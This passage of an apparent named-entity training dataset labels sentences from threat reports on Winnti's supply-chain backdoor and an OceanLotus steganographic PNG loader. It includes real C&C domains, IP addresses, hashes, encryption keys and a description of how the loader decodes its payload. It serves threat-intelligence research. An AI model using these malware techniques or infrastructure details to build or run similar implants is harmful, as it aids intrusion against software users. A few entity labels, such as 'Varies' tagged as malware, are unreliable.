configuration consists of four fields :", "spans": {}, "info": {"id": "aptner_train_000709", "source": "aptner_train"}} {"text": "C&C server URL .", "spans": {}, "info": {"id": "aptner_train_000710", "source": "aptner_train"}} {"text": "Variable ( t ) used to determine the time to sleep in milliseconds before continuing the execution .", "spans": {}, "info": {"id": "aptner_train_000711", "source": "aptner_train"}} {"text": "Wait time is chosen randomly in the range 2/3 t to 5/3 t .", "spans": {}, "info": {"id": "aptner_train_000712", "source": "aptner_train"}} {"text": "A string identifying a campaign .", "spans": {}, "info": {"id": "aptner_train_000713", "source": "aptner_train"}} {"text": "A semicolon-separated list of executable filenames .", "spans": {}, "info": {"id": "aptner_train_000714", "source": "aptner_train"}} {"text": "If any of them are running , the 
backdoor stops its execution .", "spans": {}, "info": {"id": "aptner_train_000715", "source": "aptner_train"}} {"text": "ESET researchers have identified five versions of the payload :", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "aptner_train_000716", "source": "aptner_train"}} {"text": "Winnti : a045939f 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php": [[38, 101]]}, "info": {"id": "aptner_train_000717", "source": "aptner_train"}} {"text": "Winnti : a260dcf1 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php": [[38, 104]]}, "info": {"id": "aptner_train_000718", "source": "aptner_train"}} {"text": "Winnti : dde82093 2018-07-11 15:45:57 https://bugcheck.xigncodeservice.com/Common/Lib/common.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[38, 96]]}, "info": {"id": "aptner_train_000719", "source": "aptner_train"}} {"text": "Winnti : 44260a1d 2018-08-15 10:59:09 https://dump.gxxservice.com/common/up/up_base.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://dump.gxxservice.com/common/up/up_base.php": [[38, 87]]}, "info": {"id": "aptner_train_000720", "source": "aptner_train"}} {"text": "Winnti : 8272c1f4 2018-11-01 13:16:24 https://nw.infestexe.com/version/last.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: https://nw.infestexe.com/version/last.php": [[38, 79]]}, "info": {"id": "aptner_train_000721", "source": "aptner_train"}} {"text": "In the first three variants , the code was not recompiled , but the configuration data was edited in the DLL file itself .", "spans": {"System: DLL": [[105, 108]]}, "info": {"id": 
"aptner_train_000722", "source": "aptner_train"}} {"text": "The rest of the content is a byte for byte copy .", "spans": {}, "info": {"id": "aptner_train_000723", "source": "aptner_train"}} {"text": "Domain names were carefully chosen to look like they are related to the game or application publisher .", "spans": {}, "info": {"id": "aptner_train_000724", "source": "aptner_train"}} {"text": "The apex domain was set to redirect to a relevant legitimate site using the Namecheap redirection service , while the subdomain points to the malicious C&C server .", "spans": {"System: Namecheap": [[76, 85]]}, "info": {"id": "aptner_train_000725", "source": "aptner_train"}} {"text": "Winnti : xigncodeservice.com 2018-07-10 09:18:17 https://namu.wiki/w/XIGNCODE .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: xigncodeservice.com": [[9, 28]], "Indicator: https://namu.wiki/w/XIGNCODE": [[49, 77]]}, "info": {"id": "aptner_train_000726", "source": "aptner_train"}} {"text": "Winnti : gxxservice.com 2018-08-14 13:53:41 None or unknown .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: gxxservice.com": [[9, 23]]}, "info": {"id": "aptner_train_000727", "source": "aptner_train"}} {"text": "Winnti : infestexe.com 2018-11-07 08:46:44 https://www.facebook.com/infest.in.th .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: infestexe.com": [[9, 22]], "Indicator: https://www.facebook.com/infest.in.th": [[43, 80]]}, "info": {"id": "aptner_train_000728", "source": "aptner_train"}} {"text": "Winnti : bugcheck.xigncodeservice.com 167.99.106.49 , 178.128.180.206 DigitalOcean .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: bugcheck.xigncodeservice.com": [[9, 37]], "Indicator: 167.99.106.49": [[38, 51]], "Indicator: 178.128.180.206": [[54, 69]], "Organization: DigitalOcean": [[70, 82]]}, "info": {"id": "aptner_train_000729", "source": "aptner_train"}} {"text": "Winnti : dump.gxxservice.com 142.93.204.230 DigitalOcean .", "spans": {"Organization: Winnti": [[0, 
6]], "Indicator: dump.gxxservice.com": [[9, 28]], "Indicator: 142.93.204.230": [[29, 43]], "Organization: DigitalOcean": [[44, 56]]}, "info": {"id": "aptner_train_000730", "source": "aptner_train"}} {"text": "Winnti : nw.infestexe.com 138.68.14.195 DigitalOcean .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: nw.infestexe.com": [[9, 25]], "Indicator: 138.68.14.195": [[26, 39]], "Organization: DigitalOcean": [[40, 52]]}, "info": {"id": "aptner_train_000731", "source": "aptner_train"}} {"text": "At the time of writing , none of the domains resolve and the C&C servers are not responding .", "spans": {}, "info": {"id": "aptner_train_000732", "source": "aptner_train"}} {"text": "A bot identifier is generated from the machine’s MAC address .", "spans": {}, "info": {"id": "aptner_train_000733", "source": "aptner_train"}} {"text": "The backdoor reports information about the machine such as the user name , computer name , Windows version and system language to the C&C server and awaits commands .", "spans": {"System: Windows": [[91, 98]]}, "info": {"id": "aptner_train_000734", "source": "aptner_train"}} {"text": "The data is XOR encrypted with the key “ *&b0i0rong2Y7un1 ” and base64-encoded .", "spans": {"System: XOR": [[12, 15]]}, "info": {"id": "aptner_train_000735", "source": "aptner_train"}} {"text": "The data received from the C&C server is encrypted using the same key .", "spans": {}, "info": {"id": "aptner_train_000736", "source": "aptner_train"}} {"text": "This simple backdoor has only four commands that can be used by the attacker :", "spans": {}, "info": {"id": "aptner_train_000737", "source": "aptner_train"}} {"text": "DownUrlFile DownRunUrlFile RunUrlBinInMem UnInstall .", "spans": {}, "info": {"id": "aptner_train_000738", "source": "aptner_train"}} {"text": "The commands are pretty much self-explanatory .", "spans": {}, "info": {"id": "aptner_train_000739", "source": "aptner_train"}} {"text": "They allow the attacker to run additional executables 
from a given URL .", "spans": {}, "info": {"id": "aptner_train_000740", "source": "aptner_train"}} {"text": "The last one is perhaps less obvious .", "spans": {}, "info": {"id": "aptner_train_000741", "source": "aptner_train"}} {"text": "The UnInstall command doesn’t remove the malware from the system .", "spans": {}, "info": {"id": "aptner_train_000742", "source": "aptner_train"}} {"text": "After all , it is embedded inside a legitimate executable that still needs to run .", "spans": {}, "info": {"id": "aptner_train_000743", "source": "aptner_train"}} {"text": "Rather than removing anything , it disables the malicious code by setting the following registry value to 1: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImageFlag .", "spans": {}, "info": {"id": "aptner_train_000744", "source": "aptner_train"}} {"text": "When the payload is started , the registry value is queried and execution is aborted if set .", "spans": {}, "info": {"id": "aptner_train_000745", "source": "aptner_train"}} {"text": "Perhaps the attackers are trying to reduce the load from their C&C servers by avoiding callbacks from uninteresting victims .", "spans": {}, "info": {"id": "aptner_train_000746", "source": "aptner_train"}} {"text": "Based on ESET telemetry , one of the second stage payload delivered to victims is Win64/Winnti.BN .", "spans": {"Organization: ESET": [[9, 13]], "Indicator: Win64/Winnti.BN": [[82, 97]]}, "info": {"id": "aptner_train_000747", "source": "aptner_train"}} {"text": "As far as we can tell , its dropper was downloaded over HTTPS from api.goallbandungtravel.com .", "spans": {"Indicator: api.goallbandungtravel.com": [[67, 93]]}, "info": {"id": "aptner_train_000748", "source": "aptner_train"}} {"text": "We have seen it installed as a Windows service and as a DLL in C:\\Windows\\System32 using the following file names :", "spans": {"System: Windows": [[31, 38]], "System: DLL": [[56, 59]]}, "info": {"id": "aptner_train_000749", "source": "aptner_train"}} {"text": 
"cscsrv.dll dwmsvc.dll iassrv.dll mprsvc.dll nlasrv.dll powfsvc.dll racsvc.dll slcsvc.dll snmpsvc.dll sspisvc.dll .", "spans": {"Indicator: cscsrv.dll": [[0, 10]], "Indicator: dwmsvc.dll": [[11, 21]], "Indicator: iassrv.dll": [[22, 32]], "Indicator: mprsvc.dll": [[33, 43]], "Indicator: nlasrv.dll": [[44, 54]], "Indicator: powfsvc.dll": [[55, 66]], "Indicator: racsvc.dll": [[67, 77]], "Indicator: slcsvc.dll": [[78, 88]], "Indicator: snmpsvc.dll": [[89, 100]], "Indicator: sspisvc.dll": [[101, 112]]}, "info": {"id": "aptner_train_000750", "source": "aptner_train"}} {"text": "The samples we have analyzed were actually quite large , each of them about 60 MB .", "spans": {}, "info": {"id": "aptner_train_000751", "source": "aptner_train"}} {"text": "This is , however , only for appearance because the real size or the PE file is between 63 KB and 72 KB , depending on the version .", "spans": {}, "info": {"id": "aptner_train_000752", "source": "aptner_train"}} {"text": "The malware files simply have lots of clean files appended to them .", "spans": {}, "info": {"id": "aptner_train_000753", "source": "aptner_train"}} {"text": "This is probably done by the component that drops and installs this malicious service .", "spans": {}, "info": {"id": "aptner_train_000754", "source": "aptner_train"}} {"text": "Once the service runs , it appends the extension .mui to its DLL path , reads that file and decrypts it using RC5 .", "spans": {"System: DLL": [[61, 64]], "System: RC5": [[110, 113]]}, "info": {"id": "aptner_train_000755", "source": "aptner_train"}} {"text": "The decrypted MUI file contains position-independent code at offset 0 .", "spans": {}, "info": {"id": "aptner_train_000756", "source": "aptner_train"}} {"text": "The RC5 key is derived from the hard drive serial number and the string “ f@Ukd!rCto R$. 
” — we were not able to obtain any MUI files nor the code that installs them in the first place .", "spans": {"System: RC5": [[4, 7]]}, "info": {"id": "aptner_train_000757", "source": "aptner_train"}} {"text": "Thus , we do not know the exact purpose of this malicious service .", "spans": {}, "info": {"id": "aptner_train_000758", "source": "aptner_train"}} {"text": "Recent versions of the malware include an “ auto-update ” mechanism , using C&C server http://checkin.travelsanignacio.com .", "spans": {"Indicator: http://checkin.travelsanignacio.com": [[87, 122]]}, "info": {"id": "aptner_train_000759", "source": "aptner_train"}} {"text": "That C&C server served the latest version of the MUI files encrypted with a static RC5 key .", "spans": {"System: RC5": [[83, 86]]}, "info": {"id": "aptner_train_000760", "source": "aptner_train"}} {"text": "The C&C server was not responding during our analysis .", "spans": {}, "info": {"id": "aptner_train_000761", "source": "aptner_train"}} {"text": "Let’s start with who is not targeted .", "spans": {}, "info": {"id": "aptner_train_000762", "source": "aptner_train"}} {"text": "Early in the payload , the malware checks to see if the system language is Russian or Chinese .", "spans": {}, "info": {"id": "aptner_train_000763", "source": "aptner_train"}} {"text": "In either case , the malware stops running .", "spans": {}, "info": {"id": "aptner_train_000764", "source": "aptner_train"}} {"text": "There is no way around this : the attackers are simply not interested in computers configured with those languages .", "spans": {}, "info": {"id": "aptner_train_000765", "source": "aptner_train"}} {"text": "ESET telemetry shows victims are mostly located in Asia , with Thailand having the largest part of the pie .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "aptner_train_000766", "source": "aptner_train"}} {"text": "Given the popularity of the compromised application that is still being distributed by its developer , it wouldn’t 
be surprising if the number of victims is in the tens or hundreds of thousands .", "spans": {}, "info": {"id": "aptner_train_000767", "source": "aptner_train"}} {"text": "Supply-chain attacks are hard to detect from the consumer perspective .", "spans": {}, "info": {"id": "aptner_train_000768", "source": "aptner_train"}} {"text": "It is impossible to start analyzing every piece of software we run , especially with all the regular updates we are encouraged or required to install .", "spans": {}, "info": {"id": "aptner_train_000769", "source": "aptner_train"}} {"text": "So , we put our trust in software vendors that the files they distribute don’t include malware .", "spans": {}, "info": {"id": "aptner_train_000770", "source": "aptner_train"}} {"text": "Perhaps that’s the reason multiple groups target software developers : compromising the vendor results in a botnet as popular as the software that is hacked .", "spans": {}, "info": {"id": "aptner_train_000771", "source": "aptner_train"}} {"text": "However , there is a downside of using such a technique : once the scheme is uncovered , the attacker loses control and computers can be cleaned through regular updates .", "spans": {}, "info": {"id": "aptner_train_000772", "source": "aptner_train"}} {"text": "We do not know the motives of the attackers at this point .", "spans": {}, "info": {"id": "aptner_train_000773", "source": "aptner_train"}} {"text": "Is it simply financial gain? Are there any reasons why the three affected products are from Asian developers and for the Asian market? Do these attackers use a botnet as part of a larger espionage operation? 
ESET products detect this threat as Win32/HackedApp.Winnti.A , Win32/HackedApp.Winnti.B , the payload as Win32/Winnti.AG , and the second stage as Win64/Winnti.BN .", "spans": {"Organization: ESET": [[208, 212]], "Indicator: Win32/HackedApp.Winnti.A": [[244, 268]], "Indicator: Win32/HackedApp.Winnti.B": [[271, 295]], "Indicator: Win32/Winnti.AG": [[313, 328]], "Indicator: Win64/Winnti.BN": [[355, 370]]}, "info": {"id": "aptner_train_000774", "source": "aptner_train"}} {"text": "Compromised file samples ( Win32/HackedApp.Winnti.A and B )", "spans": {"Indicator: Win32/HackedApp.Winnti.A and B": [[27, 57]]}, "info": {"id": "aptner_train_000775", "source": "aptner_train"}} {"text": "Winnti : 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b Tue Nov 13 10:12:58 2018 1729131071 8272c1f4 .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 7cf41b1acfb05064518a2ad9e4c16fde9185cd4b": [[9, 49]]}, "info": {"id": "aptner_train_000776", "source": "aptner_train"}} {"text": "Winnti : 7f73def251fcc34cbd6f5ac61822913479124a2a Wed Nov 14 03:50:18 2018 19317120 44260a1d .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 7f73def251fcc34cbd6f5ac61822913479124a2a": [[9, 49]]}, "info": {"id": "aptner_train_000777", "source": "aptner_train"}} {"text": "Winnti : dac0bd8972f23c9b5f7f8f06c5d629eac7926269 Tue Nov 27 03:05:16 2018 1729131071 8272c1f4 .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: dac0bd8972f23c9b5f7f8f06c5d629eac7926269": [[9, 49]]}, "info": {"id": "aptner_train_000778", "source": "aptner_train"}} {"text": "Some hashes were redacted per request from one of the vendor .", "spans": {}, "info": {"id": "aptner_train_000779", "source": "aptner_train"}} {"text": "If for a particular reason you need them , reach out to us at threatintel@eset.com .", "spans": {}, "info": {"id": "aptner_train_000780", "source": "aptner_train"}} {"text": "Payload Samples ( Win32/Winnti.AG )", "spans": {"Indicator: Win32/Winnti.AG": [[18, 33]]}, "info": {"id": "aptner_train_000781", 
"source": "aptner_train"}} {"text": "Winnti : a045939f53c5ad2c0f7368b082aa7b0bd7b116da https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: a045939f53c5ad2c0f7368b082aa7b0bd7b116da": [[9, 49]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_bsod.php": [[50, 113]]}, "info": {"id": "aptner_train_000782", "source": "aptner_train"}} {"text": "Winnti : a260dcf193e747cee49ae83568eea6c04bf93cb3 https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: a260dcf193e747cee49ae83568eea6c04bf93cb3": [[9, 49]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/Common_Include.php": [[50, 116]]}, "info": {"id": "aptner_train_000783", "source": "aptner_train"}} {"text": "Winnti : dde82093decde6371eb852a5e9a1aa4acf3b56ba https://bugcheck.xigncodeservice.com/Common/Lib/common.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: dde82093decde6371eb852a5e9a1aa4acf3b56ba": [[9, 49]], "Indicator: https://bugcheck.xigncodeservice.com/Common/Lib/common.php": [[50, 108]]}, "info": {"id": "aptner_train_000784", "source": "aptner_train"}} {"text": "Winnti : 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f https://nw.infestexe.com/version/last.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f": [[9, 49]], "Indicator: https://nw.infestexe.com/version/last.php": [[50, 91]]}, "info": {"id": "aptner_train_000785", "source": "aptner_train"}} {"text": "Winnti : 44260a1dfd92922a621124640015160e621f32d5 https://dump.gxxservice.com/common/up/up_base.php .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 44260a1dfd92922a621124640015160e621f32d5": [[9, 49]], "Indicator: https://dump.gxxservice.com/common/up/up_base.php": [[50, 99]]}, "info": {"id": "aptner_train_000786", "source": "aptner_train"}} {"text": "Second stage samples ( Win64/Winnti.BN )", "spans": {"Indicator: 
Win64/Winnti.BN": [[23, 38]]}, "info": {"id": "aptner_train_000787", "source": "aptner_train"}} {"text": "Winnti : Dropper delivered by api.goallbandungtravel.com .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: api.goallbandungtravel.com": [[30, 56]]}, "info": {"id": "aptner_train_000788", "source": "aptner_train"}} {"text": "Winnti : 4256fa6f6a39add6a1fa10ef1497a74088f12be0 2018-07-25 10:13:41 None .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: 4256fa6f6a39add6a1fa10ef1497a74088f12be0": [[9, 49]]}, "info": {"id": "aptner_train_000789", "source": "aptner_train"}} {"text": "Winnti : bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81 2018-10-10 09:57:31 http://checkin.travelsanignacio.com .", "spans": {"Organization: Winnti": [[0, 6]], "Indicator: bb4ab0d8d05a3404f1f53f152ebd79f4ba4d4d81": [[9, 49]], "Indicator: http://checkin.travelsanignacio.com": [[70, 105]]}, "info": {"id": "aptner_train_000790", "source": "aptner_train"}} {"text": "Winnti : T1195 Supply Chain Compromise .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000791", "source": "aptner_train"}} {"text": "Winnti : T1050 New Service .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000792", "source": "aptner_train"}} {"text": "Winnti : T1022 Data Encrypted .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000793", "source": "aptner_train"}} {"text": "Winnti : T1079 Multilayer Encryption .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000794", "source": "aptner_train"}} {"text": "Winnti : T1032 Standard Cryptographic Protocol ( RC4 , RC5 ) .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000795", "source": "aptner_train"}} {"text": "Winnti : T1043 Commonly Used Port ( 80 , 443 ) .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_000796", "source": "aptner_train"}} {"text": "OceanLotus Steganography Malware Analysis White 
Paper .", "spans": {"Organization: OceanLotus": [[0, 10]]}, "info": {"id": "aptner_train_000797", "source": "aptner_train"}} {"text": "While continuing to monitor activity of the OceanLotus APT Group , BlackBerry Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file .", "spans": {"Organization: OceanLotus": [[44, 54]], "Organization: BlackBerry Cylance": [[67, 85]]}, "info": {"id": "aptner_train_000798", "source": "aptner_train"}} {"text": "The steganography algorithm appears to be bespoke and utilizes a least significant bit approach to minimize visual differences when compared with the original image to prevent analysis by discovery tools .", "spans": {}, "info": {"id": "aptner_train_000799", "source": "aptner_train"}} {"text": "Once decoded , decrypted , and executed , an obfuscated loader will load one of the APT32 backdoors .", "spans": {"Organization: APT32": [[84, 89]]}, "info": {"id": "aptner_train_000800", "source": "aptner_train"}} {"text": "Thus far , BlackBerry Cylance has observed two backdoors being used in combination with the steganography loader – a version of Denes backdoor ( bearing similarities to the one described by ESET ) , and an updated version of Remy backdoor .", "spans": {"Organization: BlackBerry Cylance": [[11, 29]], "Malware: Denes backdoor": [[128, 142]], "Organization: ESET": [[190, 194]], "Malware: Remy backdoor": [[225, 238]]}, "info": {"id": "aptner_train_000801", "source": "aptner_train"}} {"text": "However , this can be easily modified by the threat actor to deliver other malicious payloads .", "spans": {}, "info": {"id": "aptner_train_000802", "source": "aptner_train"}} {"text": "The complexity of the shellcode and loaders shows the group continues to invest heavily in development of bespoke tooling .", "spans": {}, "info": {"id": "aptner_train_000803", "source": "aptner_train"}} {"text": "This white paper describes the steganography 
algorithm used in two distinct loader variants and looks at the launcher of the backdoor that was encoded in one of the .png cover images . mcvsocfg.dll :", "spans": {"Indicator: mcvsocfg.dll": [[185, 197]]}, "info": {"id": "aptner_train_000804", "source": "aptner_train"}} {"text": "ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4 Malware/Backdoor 659 KB ( 674 , 816 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 .", "spans": {"Indicator: ae1b6f50b166024f960ac792697cd688be9288601f423c15abbc755c66b6daa4": [[0, 64]], "System: Windows": [[132, 139]], "System: DLL": [[142, 145]], "Organization: Intel": [[160, 165]]}, "info": {"id": "aptner_train_000805", "source": "aptner_train"}} {"text": "This particular OceanLotus malware loader attempts to imitate McAfee ’s McVsoCfg DLL and expects to be side-loaded by the legitimate \" On Demand Scanner \" executable .", "spans": {"Organization: OceanLotus": [[16, 26]], "System: McVsoCfg DLL": [[72, 84]]}, "info": {"id": "aptner_train_000806", "source": "aptner_train"}} {"text": "It arrives together with an encrypted payload stored in a separate .png image file .", "spans": {}, "info": {"id": "aptner_train_000807", "source": "aptner_train"}} {"text": "The .png cover file is actually a valid image file that is not malicious on its own .", "spans": {}, "info": {"id": "aptner_train_000808", "source": "aptner_train"}} {"text": "The payload is encoded inside this image with the use of a technique called steganography , which utilizes the least significant bits of each pixel’s color code to store hidden information , without making overtly visible changes to the picture itself .", "spans": {}, "info": {"id": "aptner_train_000809", "source": "aptner_train"}} {"text": "The encoded payload is additionally encrypted with AES128 and further obfuscated with XOR in an attempt to fool steganography detection tools .", "spans": {"System: XOR": [[86, 89]]}, "info": {"id": 
"aptner_train_000810", "source": "aptner_train"}} {"text": "Features :", "spans": {}, "info": {"id": "aptner_train_000811", "source": "aptner_train"}} {"text": "Side-loaded DLL Loads next-stage payload using custom .png steganography Uses AES128 implementation from Crypto++ library for payload decryption Known to load Denes backdoor , might possibly be used also with other payloads .", "spans": {"System: DLL": [[12, 15]], "System: custom .png steganography": [[47, 72]], "System: Crypto++ library": [[105, 121]], "Malware: Denes backdoor": [[159, 173]]}, "info": {"id": "aptner_train_000812", "source": "aptner_train"}} {"text": "The malicious DLL exports the same function names as the original mcvsocfg.dll library .", "spans": {"System: DLL": [[14, 17]], "Indicator: mcvsocfg.dll": [[66, 78]]}, "info": {"id": "aptner_train_000813", "source": "aptner_train"}} {"text": "All exports contain the exact same code which will decrypt the payload , inject it into memory , and execute it .", "spans": {}, "info": {"id": "aptner_train_000814", "source": "aptner_train"}} {"text": "The payload is encoded inside a separate .png file using a technique called steganography .", "spans": {}, "info": {"id": "aptner_train_000815", "source": "aptner_train"}} {"text": "On top of that , the decoded payload is also encrypted with AES-128 and finally obfuscated with XOR 0x3B .", "spans": {}, "info": {"id": "aptner_train_000816", "source": "aptner_train"}} {"text": "It’s worth noting that the XOR key is not hardcoded , but instead is read from the first byte of the C:\\Windows\\system.ini file .", "spans": {"System: XOR": [[27, 30]], "Indicator: C:\\Windows\\system.ini": [[101, 122]]}, "info": {"id": "aptner_train_000817", "source": "aptner_train"}} {"text": "One of the payloads we encountered was encoded inside an image of Kaito Kuroba1 , the gentleman thief character from a popular Japanese manga series .", "spans": {}, "info": {"id": "aptner_train_000818", "source": "aptner_train"}} {"text": 
"To extract the payload , the malware will first initialize the GDI+ API and get the image width and height values .", "spans": {}, "info": {"id": "aptner_train_000819", "source": "aptner_train"}} {"text": "The size of the payload is encoded within the first four pixels of the image .", "spans": {}, "info": {"id": "aptner_train_000820", "source": "aptner_train"}} {"text": "After obtaining the size , the malware will allocate an appropriate memory buffer and proceed to decode the remaining payload byte by byte .", "spans": {}, "info": {"id": "aptner_train_000821", "source": "aptner_train"}} {"text": "The payload is encoded in the same way as the size – each byte of the payload is computed from the ARGB color codes of each subsequent pixel in the image .", "spans": {}, "info": {"id": "aptner_train_000822", "source": "aptner_train"}} {"text": "In case the payload is bigger than the image used to store it , the remaining payload bytes are simply attached to the image after its IEND marker , and read directly from the file .", "spans": {}, "info": {"id": "aptner_train_000823", "source": "aptner_train"}} {"text": "The pixel encoding algorithm is fairly straightforward and aims to minimize visual differences when compared to the original image by only modifying the least significant bits of the red , green , and blue color byte values .", "spans": {}, "info": {"id": "aptner_train_000824", "source": "aptner_train"}} {"text": "The alpha channel byte remains unchanged .", "spans": {}, "info": {"id": "aptner_train_000825", "source": "aptner_train"}} {"text": "To encode a byte of the payload , the first three bits ( 0-2 ) are stored in the red color , the next three bits ( 3-5 ) are stored in the green color , and the final two bits ( 6-7 ) are stored in the blue color .", "spans": {}, "info": {"id": "aptner_train_000826", "source": "aptner_train"}} {"text": "Decoding is a simple inverse operation .", "spans": {}, "info": {"id": "aptner_train_000827", "source": 
"aptner_train"}} {"text": "Windows converts the .png pixel RGBA value to an ARGB encoding via the GdpiBitmapGetPixel API .", "spans": {"System: Windows": [[0, 7]], "System: GdpiBitmapGetPixel API": [[71, 93]]}, "info": {"id": "aptner_train_000828", "source": "aptner_train"}} {"text": "To aid in the recovery of encrypted payloads , the following Python script can be used to decode pixel colors from a .png image .", "spans": {"System: Python script": [[61, 74]]}, "info": {"id": "aptner_train_000829", "source": "aptner_train"}} {"text": "After decoding the .png image , the loader then proceeds to initialize the key and IV used to perform AES decryption of the encrypted payload .", "spans": {}, "info": {"id": "aptner_train_000830", "source": "aptner_train"}} {"text": "Both values are supplied from an array of 256 pseudo-random bytes hardcoded in the binary’s .rdata section .", "spans": {}, "info": {"id": "aptner_train_000831", "source": "aptner_train"}} {"text": "The first two bytes of that array specify the relative offsets to the key and IV respectively .", "spans": {}, "info": {"id": "aptner_train_000832", "source": "aptner_train"}} {"text": "The loader uses the AES128 implementation from the open-source Crypto++2 library .", "spans": {"System: Crypto++2 library": [[63, 80]]}, "info": {"id": "aptner_train_000833", "source": "aptner_train"}} {"text": "We were able to correlate most of the disassembly to the corresponding functions from the Crypto++ github source , and it doesn’t appear that the malware authors have modified much of the original code .", "spans": {"System: Crypto++": [[90, 98]]}, "info": {"id": "aptner_train_000834", "source": "aptner_train"}} {"text": "A SimpleKeyringInterface class is used to initialize the key , while the IV is passed to the SetCipherWithIV function .", "spans": {"System: SimpleKeyringInterface": [[2, 24]], "System: SetCipherWithIV": [[93, 108]]}, "info": {"id": "aptner_train_000835", "source": "aptner_train"}} {"text": "The 
decryption is performed with the use of the StreamTransformationFilter class with the StreamTransformation cipher set to AES CBC decryption mode .", "spans": {"System: StreamTransformationFilter": [[48, 74]], "System: StreamTransformation": [[90, 110]]}, "info": {"id": "aptner_train_000836", "source": "aptner_train"}} {"text": "The library code performs numerous checks for the CPU features , and based on the outcome , it will choose a processor-specific implementation of the cryptographic function .", "spans": {}, "info": {"id": "aptner_train_000837", "source": "aptner_train"}} {"text": "One of the AES implementations makes use of the Intel AES-NI encryption instruction set which is supported by several modern Intel and AMD CPUs .", "spans": {"Organization: Intel": [[48, 53], [125, 130]], "System: AES-NI": [[54, 60]], "Organization: AMD": [[135, 138]]}, "info": {"id": "aptner_train_000838", "source": "aptner_train"}} {"text": "The decrypted payload undergoes one final transformation , where it is XORed with the first byte read from the C:\\Windows\\system . 
ini file , which is expected to begin with a comment character \" ; \" ( 0x3B ) .", "spans": {}, "info": {"id": "aptner_train_000839", "source": "aptner_train"}} {"text": "Performing the same steps in CyberChef , it is possible to decode the encrypted payload , which should yield x86 shellcode , starting with a call immediate opcode sequence .", "spans": {"System: CyberChef": [[29, 38]]}, "info": {"id": "aptner_train_000840", "source": "aptner_train"}} {"text": "Varies :", "spans": {"Malware: Varies": [[0, 6]]}, "info": {"id": "aptner_train_000841", "source": "aptner_train"}} {"text": "4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d Malware/Backdoor 658 KB ( 674 , 304 bytes ) PE32 executable for MS Windows ( DLL ) ( console ) Intel 80386 32-bit September 2018 .", "spans": {"Indicator: 4c02b13441264bf18cc63603b767c3d804a545a60c66ca60512ee59abba28d4d": [[0, 64]], "System: Windows": [[132, 139]], "System: DLL": [[142, 145]], "Organization: Intel": [[160, 165]]}, "info": {"id": "aptner_train_000842", "source": "aptner_train"}} {"text": "While this loader differs somewhat in general implementation , the payload extraction routine seems to be the same as in the previous variant .", "spans": {}, "info": {"id": "aptner_train_000843", "source": "aptner_train"}} {"text": "The main differences are :", "spans": {}, "info": {"id": "aptner_train_000844", "source": "aptner_train"}} {"text": "The way the decryption routine is called ( from within the DllMain function , as opposed to an exported function ) .", "spans": {"System: DllMain": [[59, 66]]}, "info": {"id": "aptner_train_000845", "source": "aptner_train"}} {"text": "The way the payload is invoked ( by overwriting the return address on the stack , as opposed to a direct call ) .", "spans": {}, "info": {"id": "aptner_train_000846", "source": "aptner_train"}} {"text": "Implementation of an additional anti-analysis check that compares the name of the parent process to a string stored in an encrypted resource 
